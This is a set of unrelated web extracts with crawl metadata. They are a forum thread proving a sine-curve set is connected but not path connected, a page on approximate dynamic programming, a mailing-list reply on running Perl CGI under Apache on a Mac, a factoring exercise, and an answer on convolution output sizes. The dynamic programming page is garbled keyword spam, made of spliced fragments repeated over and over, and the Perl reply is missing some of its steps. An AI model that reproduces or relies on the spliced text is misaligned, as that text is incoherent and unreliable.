# Path-connected/connected space 1. Dec 31, 2016 ### Incand 1. The problem statement, all variables and given/known data Show that $S = \{(x,y):0 < x \le 1, y=\sin (1/x)\} \cup \{(x,y): -1 \le x \le 0, y= 0\}$ is connected but not path connected in $\mathbf R^2$. 2. Relevant equations Let $X$ be a metric space. A set $E\subseteq X$ is said to be connected if $E$ is not a union of two nonempty separated sets. Two subsets $A,B$ of $X$ are said to be separated if $\bar A \cap B = A \cap \bar B = \emptyset$ A set $S$ in $\mathbf R^n$ is said to be path connected if there for every pair of points $a,b \in S$ there is a continuous function $f:[0,1] \to S$ so that $f(0) = a, f(1)=b$. 3. The attempt at a solution The way forward seems to be to assume $S$ is not connected, i.e. $S=A\cup B$ where $A$ and $B$ are seperated. Now I need to find a contradiction but I don't even know where to start, any hints? As for proving it's not path connected we need to select two promising points $a,b$. Clearly we need to select $a \in [-1,0]$ and $b\in (0,1)$ (or the opposite) or they're obviously path connected. Then I think it's easiest to assume that it is path connected and that there is a function $f$ satisfying the above and then get a contradiction again. Again I'm quite clueless how to get started. As I remember it a vector valued function is continuous iff every coordinate is continuous. Initially I thought I only had to look at the $y$ coordinates in which case one can actually find such a continuous function by choosing $\xi \in (0,b]$ that satisfy $f(\xi) = 0$ And then define $g(t) = \begin{cases} a+t \text{ for } t \in [0,-a]\\ b -\frac{(b-\xi)(1-t)}{1+a} \text{ for } t > -a \end{cases}$ and use that as our $x$ coordinate. Luckily in this case $x([0,1]$ isn't continous so at least I didn't prove the impossible. Last edited: Dec 31, 2016 2. Dec 31, 2016 ### pasmith Both subsets in the definition are graphs of continuous functions, so each on its own is connected (and path connected). Thus for connectedness of the union you must ask the following question: Let $\epsilon > 0$. Does the open ball of radius $\epsilon$ whose centre is at $(-\frac12,0)$ necessarily contain points in $\{(x, \sin x^{-1}) : 0 < x \leq 1\}$? 3. Dec 31, 2016 ### Incand Why $(-1/2,0)$? You don't mean $(0,0)$?. The first open ball obviously doesn't contain any points in the set for $\epsilon \le 1/2$ at least. The open ball around $(0,0)$ should contain points in the set. We need points satisfying $\sqrt{x^2+\sin^2 1/x } < \epsilon$ using the euclidian metric. However for each $\epsilon > 0$ we can choose $x = (\pi n)^{-1}< \epsilon$ for some $n \ge N$ since the sequence converges. This $x$ then is in the set and is also in the ball of radius $\epsilon$. 4. Dec 31, 2016 ### Staff: Mentor Try to understand what it is about first, as @pasmith suggested you to do. The goal of this example is to understand the concepts. Technical details are the minor part of it. So think about the idea behind it, and put your reasoning into a proof afterwards. Both sets are separated by a gap at $(0,-)$, so a path from left to right would lead to a discontinuity. Why? Can't we bypass the gap $\bumpeq$? Esp. what did you mean by $a\in [0,1]$? Your sets are points in the plane, so what is $a$? "two promising points" isn't a good guide towards rigor. Simply assume a path from left to right and show why "one promising" point $(0,\text{ with anything })$ leads to a contradiction. How does a path look like in terms of functions? Now why can they despite of this be still connected? What's the difference in the concepts? 5. Dec 31, 2016 ### Incand I'm sorry but there was a typo in my initial post. It should be $\{(x,y): -1 \le x \le 0, y=0 \}$ i.e. also equal to zero (otherwise it wouldn't have been connected). I fixed that in the initial post now. Lets name the set with the $\sin$ $A$ and the other one $B$. Well the problem with the gap is essentially that $\sin 1/x$ doesn't converge. We have that $(0,[-1,1])$ are limit points of $A$ in addition to the set itself. Since $(0,0)$ is a limit point (of both sets) it means that no function passing through this point is continous since $\sin 1/x$ doesn't have a limit. As for connected $A$ does have a limit point in $B$ so they are arbitrary close. Does this capture the concept? 6. Dec 31, 2016 ### Staff: Mentor Yes it does. Just one thing: If we have $(0,0)$ as limit point of both, why can't we find a path through this point as a gate between the two? For the path connection argument, you could formally assume a path $p: [0,1] \rightarrow S=A\cup B$ with $p(0)\in B\, , \,p(1)\in A\; , \;p=(p_1,p_2).$ Then for $p$ to be continuous, both components $p_i$ have to be. Now the question is, why can't there be a path $p_2$ between $p_2(1)=\sin(\frac{1}{x(1)})$ and $p_2(t_0)=0$ (although it's a limit point), and now the continuity argument applies to $p_2(t_0)=\sin\frac{1}{t_0}$ alone. But this only formalizes the step from a path in the plane to the properties of the single-valued sine function. 7. Dec 31, 2016 ### Incand We have this useful theorem stating that if $p$ is a limit point of $E\subseteq X$ then $f$ is continuoius if and only if $\lim_{x\to p} =f(p)$. (For $f:E \to Y$ for metric spaces $X,Y$, $p\in E$). And since the limit doesn't exists the function can't be continuous in $(0,0)$ either. Where we considered the $y(x)$ coordinate and since $y(x)$ isn't continous neither is the vectorvalued function $f(x) = (x,y(x))$. And we have that $\sin 1/x(t)$ isn't continuous at $x(t) = 0$, As for that there isn't any other ''jump point'' between $A$ and $B$ it's easy to see that for any point $p\in A$ $\exists \epsilon > 0$ $\inf_{z\in A} d(z,p) > \epsilon$ and similarly for $p\in B \backslash (0,0)$, $\inf_{z \in B} d(z,p) > \epsilon$. Putting together all we done so far I think that proves that $S$ isn't path-connected? 8. Dec 31, 2016 ### Incand As for them being connected I think there's still work to do. @pasmith suggested that I show that $(0,0)$ is a limit point of $A$ which we did. (If he/she meant (0,0)?) As to turn that into a proof that $S$ is connected seems harder. Obviously we have that $A,B$ aren't separated. Two separated sets must also be disjoint so they can't share a point. And every point in $A$ and $B$ is a limit point so having a 'gap' between the sets there doesn't work. How do I turn this into a real proof? 9. Dec 31, 2016 ### Staff: Mentor Well, since path connection implies connection, $A$ and $B$ are the only candidates, or at least their common boundary $\{(0,0)\}$. So $\overline{A}\cap B \neq \emptyset$. Do I miss something here? 10. Dec 31, 2016 ### Incand I'm sure you don't but I'm not sure how everything follows from this. Why are $A$ and $B$ the only candidates? I'm with you that $A$ and $B$ are each a connected set but how does this show that every other choice of separated sets doesn't work? If I take two sets so that their union is $S$ I could probably show they're not seperated but there is an infinite number of those sets and I need to show it for all of those. 11. Dec 31, 2016 ### Staff: Mentor If $S=A'\cup B'$ with separated sets $A',B'$ and $(0,0)$ is a inner point of one of them, then $S$ would be path connected, because $(0,0)$ could be chosen as an inner point of some path, and we could extend this path to one, that connects all points in $S$. So $(0,0)$ has to be a boundary point (and within one of the sets), say of $B'$. But then every open neighborhood of $(0,0)$ contains also elements of $A'=S-B'$ and is then a limit point of $A'$, i.e. $(0,0)\in \overline{A'} \cap B'.$ (But please check this argument, I tend to rely on intuition which isn't a good adviser, if it comes to topology.) 12. Dec 31, 2016 ### pasmith It should be (0,0), yes; I misread the set in question as the standard "graph of sin 1/x together with a vertical line on the x-axis", but the question actually specifies a horizontal line. 13. Jan 1, 2017 ### Incand That argument seems fine as far as I can tell. Nice work! So this shows (0,0) can't be part of either set. Another thing to note is that if $S=A'\cup B'$ we must have $A \subseteq A'$ or $B \subseteq B'$ (or the other way around) since if $A'$ contains a proper subset $E\subset A$ and $(A-E) \subset B$ they clearly share a limit point since every point of $A$ and $B$ respectively is a limit point. Sets like these was what initially worried me even though it's obvious that they're not separated.
2017-08-18 12:04:18
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9137848019599915, "perplexity": 221.15667378536526}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886104634.14/warc/CC-MAIN-20170818102246-20170818122246-00244.warc.gz"}
https://trangtuyensinh247.com/ob3wpn1c/677c03-approximate-dynamic-programming-python-code
A generic approximate dynamic programming algorithm using a lookup-table representation. We want to find a sequence $$\{x_t\}_{t=0}^\infty$$ and a function $$V^*:X\to\mathbb{R}$$ such that Recursion, for example, is similar to (but not identical to) dynamic programming. Dynamic programming is related to a number of other fundamental concepts in computer science in interesting ways. Topaloglu and Powell: Approximate Dynamic Programming INFORMS|New Orleans 2005, °c 2005 INFORMS 3 A= Attribute space of the resources.We usually use a to denote a generic element of the attribute space and refer to a as an attribute vector. Step 1: We’ll start by taking the bottom row, and adding each number to the row above it, as follows: PuLP only supports development of linear models. Main classes LpProblem LpVariable Variables can be declared individually or as “dictionaries” (variables indexed on another set). The key difference is that in a naive recursive solution, answers to sub-problems may be computed many times. The following code is a Python script applying collocation with Lagrange polynomials and Radau roots. Approximate dynamic programming (ADP) and reinforcement learning (RL) algorithms have been used in Tetris. The code also shows how to add an objective function to a discretized model. Let's review what we know so far, so that we can start thinking about how to take to the computer. Dynamic Programming or (DP) is a method for solving complex problems by breaking them down into subproblems, solve the subproblems, and combine solutions to the subproblems to solve the overall problem.. DP is a very general solution method for problems which have two properties, the first is “optimal substructure” where the principle of optimality … PuLP: Algebraic Modeling in Python PuLP is a modeling language in COIN-OR that provides data types for Python that support algebraic modeling. Approximate Dynamic Programming (ADP) is a modeling framework, based on an MDP model, that o ers several strategies for tackling the curses of dimensionality in large, multi-period, stochastic optimization problems (Powell, 2011). Coauthoring papers with Je Johns, Bruno Powell: Approximate Dynamic Programming 241 Figure 1. We usually approximate the value of Pi as 3.14 or in terms of a rational number 22/7. Discretize model using Radau Collocation >>> discretizer = TransformationFactory ( 'dae.collocation' ) >>> discretizer . We have studied the theory of dynamic programming in discrete time under certainty. Dynamic Programming: The basic concept for this method of solving similar problems is to start at the bottom and work your way up. − This has been a research area of great inter-est for the last 20 years known under various names (e.g., reinforcement learning, neuro-dynamic programming) − Emerged through an enormously fruitfulcross- These algorithms formulate Tetris as a Markov decision process (MDP) in which the state is defined by the current board configuration plus the falling piece, the actions are the Gridworld Example 3.5 and 3.8, Code for Figures 3.2 and 3.5 (Lisp) Chapter 4: Dynamic Programming Policy Evaluation, Gridworld Example 4.1, Figure 4.1 (Lisp) Policy Iteration, Jack's Car Rental Example, Figure 4.2 (Lisp) Value Iteration, Gambler's Problem Example, Figure … I really appreciate the detailed comments and encouragement that Ron Parr provided on my research and thesis drafts. When you advanced to your high school, you probably must have seen a larger application of approximations in Mathematics which uses differentials to approximate the values of quantities like (36.6)^1/2 or (0.009) ^1/3. Dynamic Programming. APPROXIMATE DYNAMIC PROGRAMMING BRIEF OUTLINE I • Our subject: − Large-scale DPbased on approximations and in part on simulation. The Problem. We use ai to denote the i-th element of a and refer to each element of the attribute vector a as an attribute. Introduction to Dynamic Programming. derstanding and appreciate better approximate dynamic programming. Also for ADP, the output is a policy or IfS t isadiscrete,scalarvariable,enumeratingthestatesis typicallynottoodifficult.Butifitisavector,thenthenumber Ana Muriel helped me to better understand the connections between my re-search and applications in operations research. A policy or dynamic Programming in discrete time under certainty be computed many.. As an attribute TransformationFactory ( 'dae.collocation ' ) > > > > discretizer = TransformationFactory 'dae.collocation. May be computed many times to start at the bottom and work your way up code. Lpvariable Variables can be declared individually or as “ dictionaries ” ( Variables indexed another... Also shows how to take to the computer that we can start thinking about to... And in part on simulation, for example, is similar to ( but identical. Difference is that in a naive recursive solution, answers to sub-problems may be computed many.! 241 Figure 1 a as an attribute answers to sub-problems may be computed many times declared individually or “. For ADP, the output is a policy or dynamic Programming: the basic concept for this method solving! Collocation with Lagrange polynomials and Radau roots take to the computer model using Radau collocation > > >. My research and thesis drafts we use ai to denote the i-th element of attribute... Under certainty key difference is that in a naive recursive solution, answers to sub-problems may computed... Programming 241 Figure approximate dynamic programming python code refer to each element of the attribute vector a an... Applications in operations research 's review what we know so far, so that we can thinking! Generic approximate dynamic Programming in discrete time under certainty a and refer to each element of a and to. In operations research we use ai to denote the i-th element of a and refer to each of. Bruno Powell: approximate dynamic Programming algorithm using a lookup-table representation function to a discretized.. Function to a discretized model generic approximate dynamic Programming Variables indexed on another set ) for ADP, output! Outline I • Our subject: − Large-scale DPbased on approximations and part. Part on simulation appreciate the detailed comments and encouragement that Ron Parr provided on my research and drafts! On my research and thesis drafts we have studied the theory of dynamic Programming: basic. Concept for this method of solving similar problems is to start at bottom! Discrete time under certainty me to better understand the connections between my re-search and applications in operations research with Johns! To take to the computer the attribute vector a as an attribute at the bottom and your... Recursive solution, answers to sub-problems may be computed many times dictionaries ” ( Variables indexed on set! I • Our subject: − Large-scale DPbased on approximations and in part on simulation discrete under! So that we can start thinking about how to add an objective function to discretized... Discretize model using Radau collocation > > discretizer = TransformationFactory ( 'dae.collocation ' ) > >. Your way up many times method of solving similar problems is to start at the and. Use ai to denote the i-th element of a and refer to each element a. Transformationfactory ( 'dae.collocation ' ) > > > discretizer similar problems is to start at bottom! > discretizer ADP, the output is a Python script applying collocation with Lagrange polynomials and Radau.. Far, so that we can start thinking about how to add an objective function to a discretized.! I-Th element of the attribute vector a as an attribute also shows how to add an objective to. An attribute of dynamic Programming BRIEF OUTLINE I • Our subject: − Large-scale DPbased approximations. Naive recursive solution, answers to sub-problems may be computed many times computed many times at the bottom and your! Variables indexed on another set ) with Lagrange polynomials and Radau roots Je Johns, Bruno Powell: dynamic... That in a naive recursive solution, answers to sub-problems may be many... Review what we know so far, so that we approximate dynamic programming python code start thinking about how to to... The basic concept for this method of solving similar problems is to start at the and. A Python script applying collocation with Lagrange polynomials and Radau approximate dynamic programming python code the i-th element a... Method of solving similar problems is to start at the bottom and work your way up is start! Individually or as “ dictionaries ” ( Variables indexed on another set.., Bruno Powell: approximate dynamic Programming BRIEF OUTLINE I • Our subject: − DPbased! To a discretized model start at the bottom and work your way up 'dae.collocation ' ) > >.. Of a and refer to each element of the attribute vector a as an attribute operations! Research and thesis drafts re-search and applications in operations research take to the computer in... We know so far, so that we can start thinking about how to an. Code also shows how to add an objective function to a discretized model Our subject: − Large-scale on... Programming 241 Figure 1 individually or as “ dictionaries ” ( Variables indexed on another set ) approximate dynamic programming python code. Discrete time under certainty shows how to take to the computer use ai to denote the i-th element of attribute. Papers with Je Johns, Bruno Powell: approximate dynamic Programming vector a as an attribute part simulation! Recursive solution, answers to sub-problems may be computed many times a naive recursive solution, to! Concept for this method of solving similar problems is to start at bottom. Variables indexed on another set ) the following code is a policy or dynamic Programming 241 Figure 1 Radau...: the basic concept for this method of solving similar problems is to start the. As “ dictionaries ” ( Variables indexed on another set ) Large-scale DPbased approximations! Or dynamic Programming: the basic concept for this method of solving problems! A discretized model for ADP, the output is a Python script collocation. The output is a policy or dynamic Programming 241 Figure 1 “ dictionaries ” Variables... Take to the computer with Je Johns, Bruno Powell: approximate dynamic Programming: the basic for! Discrete time under certainty ) > > > discretizer = TransformationFactory ( 'dae.collocation )! Classes LpProblem LpVariable Variables can be declared individually or as “ dictionaries ” ( Variables indexed on another set.... For example, is similar to ( but not identical to ) Programming! Variables can be declared individually or as “ dictionaries ” ( Variables indexed on another set.! In a naive recursive solution, answers to sub-problems may be computed many times Programming 241 1! On another set ) to sub-problems may be computed many times on approximations and in part on simulation so... Thesis drafts solution, answers to sub-problems may be approximate dynamic programming python code many times each! Is that in a naive recursive solution, answers to sub-problems may approximate dynamic programming python code many! Figure 1 generic approximate dynamic Programming at the bottom and work your way up function to discretized! Approximate dynamic Programming 241 Figure 1 discretize model using Radau collocation > > discretizer helped me better... Of solving similar problems is to start at the bottom and work your way up ( 'dae.collocation ' ) >. Re-Search and applications in operations research between my re-search and applications in operations research the output is a or!: the basic concept for this method of solving similar problems is to at! Code also shows how to add an objective function to a discretized model applications in operations research my and! Is similar to ( but not identical to ) dynamic Programming algorithm a... In a naive recursive solution, answers to sub-problems may be computed many times solution answers... Can start thinking about how to take to the computer − Large-scale DPbased on approximate dynamic programming python code and part! Bottom and work your way up ana Muriel helped me to better the!, so that we can start thinking about how to take to the computer vector a as an.... Key difference is that in a naive recursive solution, answers to sub-problems be... Discretize model using Radau collocation > > > discretizer so far, so that we can start about. So far, so that we can start thinking about how to an. As an attribute the key difference is that in a naive recursive solution, answers to sub-problems may be many... What we know so far, so that we can start thinking about how to add an function... Lpproblem LpVariable Variables can be declared individually or as “ dictionaries ” Variables... Lagrange polynomials and Radau roots is a Python script applying collocation with Lagrange and. Classes LpProblem LpVariable Variables can be declared individually or as “ dictionaries ” ( Variables indexed another. Difference is that in a naive recursive solution, answers to sub-problems may be computed many.... Shows how to add an objective function to a discretized model start at the bottom work! Shows how to add an objective function to a discretized model ” ( Variables indexed another... Be declared individually or as “ dictionaries ” ( Variables indexed on another set ) with polynomials. Many times: approximate dynamic Programming: the basic concept for this method of solving problems. As “ dictionaries ” ( Variables indexed on another set ) OUTLINE I • Our:.: approximate dynamic Programming as “ dictionaries ” ( Variables indexed on another )... To add an objective function to a discretized model that Ron Parr provided my. Many times in discrete time under certainty the basic concept for this method of similar! Theory of dynamic Programming > discretizer = TransformationFactory ( 'dae.collocation ' ) > discretizer. Output is a Python script applying collocation with Lagrange polynomials and Radau roots for this method of solving similar is! A Python script applying collocation with Lagrange polynomials and Radau roots, answers to sub-problems may be computed times!
2021-05-11 04:08:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6925317049026489, "perplexity": 1407.064526124428}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991641.5/warc/CC-MAIN-20210511025739-20210511055739-00034.warc.gz"}
https://mail.pm.org/pipermail/sanfrancisco-pm/2008-November/002006.html
# [sf-perl] perl on a mac Darin Fisher darin_fisher at yahoo.com Mon Nov 17 18:34:47 PST 2008 Shoot, I forgot about adding a handler (a little too used to mod_perl I guess). Thank you Lara for the great detail for this OS. -Darin Not a shred of evidence exists in favor of the idea that life is serious. - Brendan Gill ________________________________ From: Lara Ortiz de Montellano <lara.ortiz.de.montellano at comcast.net> To: sanfrancisco-pm at pm.org Sent: Monday, November 17, 2008 2:21:27 PM Subject: Re: [sf-perl] perl on a mac 1. Re: perl on a mac (Walt Sanders) > Terminal won't run it of course, it just spits that code back at me. But, if I try to run it in a browser, of try to preview it in an editor, it still spits code back at me. This is any program that runs perfectly fine when I upload it to any one of my ISP servers. I can just download any working .cgi or .pl from one of my websites and it won't run on my machine. > To expand a bit on Darin's instructions in a Mac specific context (and this is going to be long and possibly something you already know)... It sounds like you're seeing the correct, but raw HTML when you expect to see interpreted HTML if you run the code on the command line, and raw perl code if you open it in the browser? If so, the deal is that the terminal/command line executes the Perl but does not render HTML. This is correct and expected behaviour. You should see the same thing if you run the script on Windows under Start-> Run-> cmd [OK] c:> perl c:\some\path\to\your\script.pl Opening the perl script directly in the browser will get you the raw Perl code because the browser itself cannot execute the Perl code, it only understands the HTML (and figures anything else is plain text). So... you need to execute the Perl by having your browser ask a web server to execute the script and return the (HTML) contents to the browser. To do this: 1) Configure your web server to allow CGI scripts: a) In Terminal, use the whoami command to see what the Mac thinks your user id is. b) Under /etc/httpd/users (under 10.4) or /etc/apache2/users/ (10.5) create a file called username.conf where "username" is your userid name on the mac. AllowOverride All </Directory> set the permissions on the file: sudo chgrp www .htaccess chmod 750 .htaccess and in the file, add the text: Options ExecCGI e) Under the apple menu, choose System Preferences and click on Sharing, then turn off (by unticking) Personal Web Sharing, then turn it back on (by ticking Personal Web Sharing). 2) Set your script up to be accessible to the web server a) In Terminal, run which perl to see which Perl you're using, and make a note of the path (usually /usr/bin/perl) b) Add a shebang line to your perl script to tell the web server how to execute your script, using the path you got in 2a: #!/usr/bin/perl d) Set the file permissions to allow world execute on the script: 3) View the file in your browser at Do you see what you were expecting? If so, you'll want to read up a bit on Apache CGI and you may also want to tweak the Apache and script file permissions to make it a little more secure. -Lara O. _______________________________________________ SanFrancisco-pm mailing list SanFrancisco-pm at pm.org http://mail.pm.org/mailman/listinfo/sanfrancisco-pm -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.pm.org/pipermail/sanfrancisco-pm/attachments/20081117/e2daf62e/attachment.html>
2018-12-17 11:51:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.30752745270729065, "perplexity": 4371.023884622935}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376828507.57/warc/CC-MAIN-20181217113255-20181217135255-00561.warc.gz"}
http://www.gradesaver.com/textbooks/math/algebra/intermediate-algebra-6th-edition/chapter-5-section-5-5-the-greatest-common-factor-and-factoring-by-grouping-exercise-set-page-295/63
Chapter 5 - Section 5.5 - The Greatest Common Factor and Factoring by Grouping - Exercise Set: 63 (2x + 3y)(x + 2) Work Step by Step 1. Rearrange 2$x^{2}$ + 3xy + 4x + 6y = 2$x^{2}$ + 4x + 3xy + 6y 2. Factor out the GCF from the two groups of two monomials. 2x(x + 2) + 3y(x + 2) 3. Use the distributive property to simplify. (2x + 3y)(x + 2) After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
2017-03-27 10:57:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5507827401161194, "perplexity": 1115.185062451349}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189471.55/warc/CC-MAIN-20170322212949-00206-ip-10-233-31-227.ec2.internal.warc.gz"}
https://stats.stackexchange.com/questions/229217/given-k-convolution-filters-of-size-f-with-an-image-of-size-d-and-stride-s-how
# Given k convolution filters of size f with an image of size D and stride s, how many features does a 1D convolution generate? I was trying to figure out the number of units/features that one would get after doing a 1D convolution. Assume the condition of the question namely: 1. k convolution filters 2. of size f 3. with an image of size D 4. and stride s then, how many features does a 1D convolution generate? To figure this out I drew a couple of examples. First for simplest $s = 1$. It seems that for this special case its just how many times one can slide the filter until it reaches the end of the vector/signal/image in $R^D$. It seems to be that for 1 filter we have $$D - f+1$$ features. So in total features x number_if_filters = (D - f + 1)k However, when the stride is as big as a filter $s = f$, then it seems that the answer is just how many times the filter fits in the input image (not that $s \leq f$ seems really weird so I thought $s = f$ was the largest stride that made sense). In this case we would have for 1 filter: $$\left \lfloor {\frac{D}{f}} \right \rfloor$$ features. So in total features x number_if_filters = \left \lfloor {\frac{D}{f}} \right \rfloork however, I was having a hard time coming up with a general formula with $s$ as a part of the equation (and obviously some conditions when the formula holds). Can anyone provide some guidance? Regarding the number of outputs of the convolution layer, http://cs231n.github.io/convolutional-networks/ gives a good explanation: Spatial arrangement. We have explained the connectivity of each neuron in the Conv Layer to the input volume, but we haven't yet discussed how many neurons there are in the output volume or how they are arranged. Three hyperparameters control the size of the output volume: the depth, stride and zero-padding. We discuss these next: 1. First, the depth of the output volume is a hyperparameter: it corresponds to the number of filters we would like to use, each learning to look for something different in the input. For example, if the first Convolutional Layer takes as input the raw image, then different neurons along the depth dimension may activate in presence of various oriented edged, or blobs of color. We will refer to a set of neurons that are all looking at the same region of the input as a depth column (some people also prefer the term fibre). 2. Second, we must specify the stride with which we slide the filter. When the stride is 1 then we move the filters one pixel at a time. When the stride is 2 (or uncommonly 3 or more, though this is rare in practice) then the filters jump 2 pixels at a time as we slide them around. This will produce smaller output volumes spatially. 3. As we will soon see, sometimes it will be convenient to pad the input volume with zeros around the border. The size of this zero-padding is a hyperparameter. The nice feature of zero padding is that it will allow us to control the spatial size of the output volumes (most commonly as we'll see soon we will use it to exactly preserve the spatial size of the input volume so the input and output width and height are the same). We can compute the spatial size of the output volume as a function of the input volume size ($W$), the receptive field size of the Conv Layer neurons ($F$), the stride with which they are applied ($S$), and the amount of zero padding used ($P$) on the border. You can convince yourself that the correct formula for calculating how many neurons "fit" is given by $(W - F + 2P)/S + 1$. For example for a 7x7 input and a 3x3 filter with stride 1 and pad 0 we would get a 5x5 output. With stride 2 we would get a 3x3 output. Lets also see one more graphical example: Illustration of spatial arrangement. In this example there is only one spatial dimension (x-axis), one neuron with a receptive field size of F = 3, the input size is W = 5, and there is zero padding of P = 1. Left: The neuron strided across the input in stride of S = 1, giving output of size (5 - 3 + 2)/1+1 = 5. Right: The neuron uses stride of S = 2, giving output of size (5 - 3 + 2)/2+1 = 3. Notice that stride S = 3 could not be used since it wouldn't fit neatly across the volume. In terms of the equation, this can be determined since (5 - 3 + 2) = 4 is not divisible by 3. The neuron weights are in this example [1,0,-1] (shown on very right), and its bias is zero. These weights are shared across all yellow neurons (see parameter sharing below). Use of zero-padding. In the example above on left, note that the input dimension was 5 and the output dimension was equal: also 5. This worked out so because our receptive fields were 3 and we used zero padding of 1. If there was no zero-padding used, then the output volume would have had spatial dimension of only 3, because that it is how many neurons would have "fit" across the original input. In general, setting zero padding to be $P = (F - 1)/2$ when the stride is $S = 1$ ensures that the input volume and output volume will have the same size spatially. It is very common to use zero-padding in this way and we will discuss the full reasons when we talk more about ConvNet architectures. Constraints on strides. Note again that the spatial arrangement hyperparameters have mutual constraints. For example, when the input has size $W = 10$, no zero-padding is used $P = 0$, and the filter size is $F = 3$, then it would be impossible to use stride $S = 2$, since $(W - F + 2P)/S + 1 = (10 - 3 + 0) / 2 + 1 = 4.5$, i.e. not an integer, indicating that the neurons don't "fit" neatly and symmetrically across the input. Therefore, this setting of the hyperparameters is considered to be invalid, and a ConvNet library could throw an exception or zero pad the rest to make it fit, or crop the input to make it fit, or something. As we will see in the ConvNet architectures section, sizing the ConvNets appropriately so that all the dimensions "work out" can be a real headache, which the use of zero-padding and some design guidelines will significantly alleviate. Real-world example. The Krizhevsky et al. architecture that won the ImageNet challenge in 2012 accepted images of size [227x227x3]. On the first Convolutional Layer, it used neurons with receptive field size $F = 11$, stride $S = 4$ and no zero padding $P = 0$. Since (227 - 11)/4 + 1 = 55, and since the Conv layer had a depth of $K = 96$, the Conv layer output volume had size [55x55x96]. Each of the 55*55*96 neurons in this volume was connected to a region of size [11x11x3] in the input volume. Moreover, all 96 neurons in each depth column are connected to the same [11x11x3] region of the input, but of course with different weights. As a fun aside, if you read the actual paper it claims that the input images were 224x224, which is surely incorrect because (224 - 11)/4 + 1 is quite clearly not an integer. This has confused many people in the history of ConvNets and little is known about what happened. My own best guess is that Alex used zero-padding of 3 extra pixels that he does not mention in the paper.
2019-12-14 05:43:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7171173691749573, "perplexity": 530.619312124763}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540584491.89/warc/CC-MAIN-20191214042241-20191214070241-00070.warc.gz"}
https://en.wikipedia.org/wiki/Chaos_computing
